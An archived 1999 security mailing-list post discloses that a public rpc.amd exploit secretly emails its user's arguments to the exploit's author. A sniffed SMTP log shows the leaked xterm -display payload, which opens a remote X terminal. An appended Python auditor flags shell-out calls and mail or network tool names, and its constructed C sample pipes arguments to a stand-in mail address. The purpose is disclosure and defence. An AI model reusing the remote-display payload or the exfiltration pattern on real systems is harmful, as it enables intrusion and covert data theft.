Hello,

Sorry if this was already known.

Recently someone named Taeho Oh published an exploit for a buffer overflow in rpc.amd (automount). While testing this exploit on my own server, I saw that I was opening a connection to ohhara.postech.ac.kr on port 25. After a little research I found out that the exploit (in its original form) was sending an email to abuserat_private and listing the arguments I just entered.

There is an easy way to stop it from sending. Just comment out the line:

    system(cmd);

Here's the log as I got it from sniffit:

    EHLO BlackMesa.com
    MAIL From:<lockeat_private> SIZE=95
    RCPT To:<abuserat_private>
    DATA
    Received: (from root@localhost) by BlackMesa.com (8.9.3/8.9.3) id FAA01208 for abuserat_private; Sat, 4 Sep 1999 05:30:56 +0200
    Date: Sat, 4 Sep 1999 05:30:56 +0200
    From: locke <lockeat_private>
    Message-Id: <199909040330.FAA01208at_private>
    To: abuserat_private

    10.0.0.9 /usr/X11R6/bin/xterm -display 10.0.0.8:0
    .
    QUIT
    QUIT

(IPs changed to protect the innocent)

Bye
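Added example, not part of the original post or of the exploit it describes: a small pre-run audit that flags shell-out calls and mail or network command strings in untrusted proof-of-concept C source, ignoring commented-out code. The sample source, the address collector@example.invalid and the helper names are constructed for illustration.

```python
import re

# Calls that hand a string to a shell or start another program.
SHELL_OUT = re.compile(r'\b(system|popen|execl|execlp|execle|execv|execvp|execve)\s*\(')
# Hints that a string literal builds a mail or network command.
PHONE_HOME = re.compile(r'\b(mail|sendmail|mailx|telnet|nc|ftp|wget|curl)\b|[\w.-]+@[\w.-]+')
STRING_LIT = re.compile(r'"((?:[^"\\]|\\.)*)"')
# Matches a string literal or a comment, so comment markers inside strings are left alone.
TOKEN = re.compile(r'"(?:[^"\\\n]|\\.)*"|/\*.*?\*/|//[^\n]*', re.S)

def strip_comments(src):
    """Blank out C comments while keeping line numbers and string literals."""
    def repl(m):
        tok = m.group(0)
        return tok if tok.startswith('"') else re.sub(r'[^\n]', ' ', tok)
    return TOKEN.sub(repl, src)

def audit(src):
    """Return (line number, kind, text) for every suspicious construct in live code."""
    findings = []
    for no, line in enumerate(strip_comments(src).splitlines(), 1):
        if SHELL_OUT.search(line):
            findings.append((no, "shell-out", line.strip()))
        for lit in STRING_LIT.findall(line):
            if PHONE_HOME.search(lit):
                findings.append((no, "phone-home string", lit))
    return findings

# Constructed stand-in for the reporting code described in the post.
SAMPLE = r'''
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char **argv) {
    char cmd[512];
    /* report the arguments the user typed */
    snprintf(cmd, sizeof cmd, "echo '%s %s' | mail collector@example.invalid",
             argv[1], argv[2]);
    system(cmd);
    return 0;
}
'''
# The same source after the fix from the post: the system() line commented out.
PATCHED = SAMPLE.replace("system(cmd);", "/* system(cmd); */")

if __name__ == "__main__":
    for label, src in (("original", SAMPLE), ("patched", PATCHED)):
        for no, kind, text in audit(src):
            print(f"{label}:{no}: {kind}: {text}")
```

On the patched source the shell-out finding disappears, but the mail command string is still reported, which is the cue to read the rest of the file before running it.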
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:01:34 PDT